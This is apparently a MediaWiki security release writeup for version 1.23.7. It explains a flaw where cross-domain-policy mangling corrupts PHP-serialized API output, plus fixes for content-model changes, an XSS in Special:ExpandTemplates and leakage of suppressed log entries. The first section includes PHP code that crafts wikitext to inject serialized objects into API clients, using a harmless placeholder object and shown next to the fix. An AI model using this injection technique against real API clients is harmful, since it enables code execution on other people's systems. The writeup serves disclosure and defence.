User:CSteipp (WMF)/SecurityRelease 1.23.7

This is a brief writeup on the security flaws fixed in the 1.23.7 (and 1.22.14/1.19.22) release.

= <cross-domain-policy> mangling allows injection in API format=php =

Background: Adobe Flash (and Microsoft Silverlight) can make requests to, and read responses from, domains other than the one hosting the .swf file if the target domain permits it with a cross-domain policy. The policy is an XML document and is either served from the site's default location (domain.com/crossdomain.xml), or the SWF can tell the plugin to load a policy from another path on the target domain (domain.com/foo/bar/mypolicy.xml, via Security.loadPolicyFile). Because a wiki serves user-supplied text, anyone could add text that looked like a cross-domain policy to a wiki page, point the plugin at that page's action=raw URL as the policy location, and the Flash plugin would then grant the SWF full access to the wiki as the logged-in user.

Adobe later changed the Flash plugin to always fetch the master policy at /crossdomain.xml in the domain root first, so that site owners can forbid policy files elsewhere on the domain (by restricting the master policy's site-control element to permitted-cross-domain-policies="master-only"). But before that change existed, MediaWiki took the precaution of rewriting any output containing "<cross-domain-policy>" to "<NOT-cross-domain-policy>", so that a wiki page could never be parsed as a policy.

Issues: Besides preventing an accurate representation of wiki content that happens to contain the string "<cross-domain-policy>" (T68776), the rewrite changes the length of the output string (the replacement is four bytes longer than the original, and removing whitespace alongside it changes the length further). PleaseStand recognized that in PHP serialization (format=php in calls to the API) every string is prefixed with its byte length, and because the mangling runs on the already-serialized text, the prefixes no longer match the bytes that follow them. An attacker who controls page content can therefore arrange for the bytes past the declared length to be parsed as further serialized data, injecting attacker-controlled serialized objects into the output; unserializing such objects can execute attacker-controlled code (through __wakeup(), __destruct() and similar magic methods) in API clients. This flaw has been present since the initial commit of the Flash mangling in 28dc3ec8 (MediaWiki 1.10). Although this code injection doesn't affect the server hosting the wiki, the issue was important to fix because of the number of bots that use the php-format API on WMF wikis.

Fix: To prevent exploiting the specific issue, we throw an exception when the output of a php-formatted API call contains "<cross-domain-policy>" and mangling is enabled, rather than emitting a blob that no longer unserializes to what the server produced. Mangling can also be disabled with a config flag ($wgMangleFlashPolicy = false) if site administrators have deployed a master policy at their domain's root whose site-control element permits only the master policy, which prevents policies from being defined on the wiki. Disabling it without such a root policy reopens the original cross-domain-policy problem.
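The following is an added example, not MediaWiki's code, reproducing the mechanism behind the issue and the fix above with stand-in functions. The mangling regex, the result-array layout, the key names and the stdClass payload are constructed for the demonstration; the $mangle parameter stands in for $wgMangleFlashPolicy.

```php
<?php
// Added example, not MediaWiki's code. A serialized PHP value carries byte
// lengths (s:N:"..."), so rewriting the serialized text afterwards
// desynchronises the client's parser. Array layout, key names and the
// stdClass payload are constructed for the demonstration.

// Stand-in for the flash-policy mangling: the tag grows by four bytes.
function mangleFlashPolicy( string $s ): string {
    return preg_replace( '/<(\s*)(cross-domain-policy\s*>)/i', '<$1NOT-$2', $s );
}

// Constructed API result: attacker-controlled page text, then a server-set field.
function buildResult( string $wikitext ): array {
    return [ 'content' => $wikitext, 'admin' => false ];
}

// Vulnerable order of operations: serialize first, then mangle the serialized blob.
function vulnerableOutput( string $wikitext ): string {
    return mangleFlashPolicy( serialize( buildResult( $wikitext ) ) );
}

// Fixed behaviour: if mangling would alter the serialized text, refuse to emit
// format=php output instead of corrupting it. $mangle models $wgMangleFlashPolicy.
function fixedOutput( string $wikitext, bool $mangle = true ): string {
    $text = serialize( buildResult( $wikitext ) );
    if ( $mangle && mangleFlashPolicy( $text ) !== $text ) {
        throw new RuntimeException( 'This response cannot be represented using format=php' );
    }
    return $text;
}

// Build wikitext that, after mangling, smuggles $serializedValue into the
// client's result. Each <cross-domain-policy> gains 4 bytes when mangled, so k
// tags leave the client's string boundary 4k bytes short of the real end; the
// last 4k bytes of the text are then parsed as the array's second element.
function craftInjection( string $serializedValue ): string {
    $key = 'obj';
    while ( true ) {
        // close the truncated string, supply key + value, close the array
        $tail = '";' . serialize( $key ) . $serializedValue . '}';
        if ( strlen( $tail ) % 4 === 0 ) {
            break;
        }
        $key .= '_'; // lengthen the key until the tail is a multiple of 4 bytes
    }
    return str_repeat( '<cross-domain-policy>', intdiv( strlen( $tail ), 4 ) ) . $tail;
}

// Benign content round-trips unchanged.
$benign = 'Hello world';
var_dump( unserialize( vulnerableOutput( $benign ) ) === buildResult( $benign ) ); // bool(true)

// Hostile content: a harmless stdClass stands in for a gadget object whose
// __wakeup()/__destruct() would run inside the API client.
$hostile = craftInjection( 'O:8:"stdClass":0:{}' );
$client = @unserialize( vulnerableOutput( $hostile ) ); // PHP >= 8.3 warns about the unconsumed original tail
var_dump( isset( $client['obj'] ) && $client['obj'] instanceof stdClass ); // bool(true)
var_dump( array_key_exists( 'admin', $client ) );                          // bool(false): the server's field never arrives

// With the fix, the same content is rejected rather than corrupted.
try {
    fixedOutput( $hostile );
} catch ( RuntimeException $e ) {
    echo $e->getMessage(), "\n";
}
```

The injected tail has to end with a `}` that closes the array the client is reading, so the original closing bytes become trailing data; PHP versions before 8.3 accept that silently, which is why the corrupted blob still unserializes cleanly for a bot.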

= Users can change the content model of other users' user pages to CSS or JS = 
 * (bug 70901) SECURITY: User Jackmcbarn reported that the ability to update the content model for a page could allow an unprivileged attacker to edit another user's common.js under certain circumstances. The user right "editcontentmodel" was added, and is needed to change a revision's content model.

= XSS in Special:ExpandTemplates when $wgRawHtml = true = 
 * (bug 71111) SECURITY: User PleaseStand reported that on wikis that allow raw HTML, it is not safe to preview wikitext coming from an untrusted source such as a cross-site request. Thus add an edit token to the form, and when raw HTML is allowed, ensure the token is provided before showing the preview. This check is not performed on wikis that both allow raw HTML and anonymous editing, since there are easier ways to exploit that scenario.
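The gate described in the note above, as an added example that is not MediaWiki's code: a session-bound token that a cross-site form cannot supply, checked only where raw HTML would make the preview dangerous. The token construction (an HMAC over a per-session secret), the function names and the two boolean flags modelling $wgRawHtml and anonymous-edit permission are assumptions made for this demonstration.

```php
<?php
// Added example, not MediaWiki's code: a stand-in for the preview gate the
// fix describes. Token construction, function names and the option flags
// (modelling $wgRawHtml and anonymous-edit permission) are assumptions.

// Token that only the legitimate form can carry: it derives from a secret
// held in the user's session, which a cross-site page cannot read.
function editToken( string $sessionSecret ): string {
    return hash_hmac( 'sha256', 'Special:ExpandTemplates', $sessionSecret );
}

// Constant-time comparison; a missing token never matches.
function matchEditToken( string $sessionSecret, ?string $presented ): bool {
    return $presented !== null && hash_equals( editToken( $sessionSecret ), $presented );
}

// Should the submitted wikitext be previewed?
//   $rawHtml     - wiki allows raw <html> in wikitext, so a preview can carry script
//   $anonCanEdit - anonymous users can already save such wikitext, so the gate adds nothing
function mayRenderPreview( bool $rawHtml, bool $anonCanEdit, string $sessionSecret, ?string $presented ): bool {
    if ( !$rawHtml ) {
        return true;   // preview is sanitised wikitext; safe regardless of origin
    }
    if ( $anonCanEdit ) {
        return true;   // the exception stated in the note: easier routes exist on such wikis
    }
    return matchEditToken( $sessionSecret, $presented );
}

// Constructed scenarios.
$secret = bin2hex( random_bytes( 16 ) );  // per-session secret, normally stored server-side

// A cross-site form post cannot include the victim's token.
var_dump( mayRenderPreview( true, false, $secret, null ) );                   // bool(false)
// A forged or stale token fails the constant-time comparison.
var_dump( mayRenderPreview( true, false, $secret, str_repeat( '0', 64 ) ) );  // bool(false)
// The wiki's own form embeds the token, so its submission is previewed.
var_dump( mayRenderPreview( true, false, $secret, editToken( $secret ) ) );   // bool(true)
// Without $wgRawHtml the preview is sanitised output and needs no gate.
var_dump( mayRenderPreview( false, false, $secret, null ) );                  // bool(true)
```

The token is embedded in the form the wiki renders, so a submission that arrives without it is, by construction, not coming from that form.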

= list=logevents in API shows type/action of suppressed and revdeleted log entries = 
 * (bug 72222) SECURITY: Do not show log action when the entry is revdeleted with DELETED_ACTION. NOTICE: this may be reverted in a future release pending a public RFC about the desired functionality. This issue was reported by user Bawolff.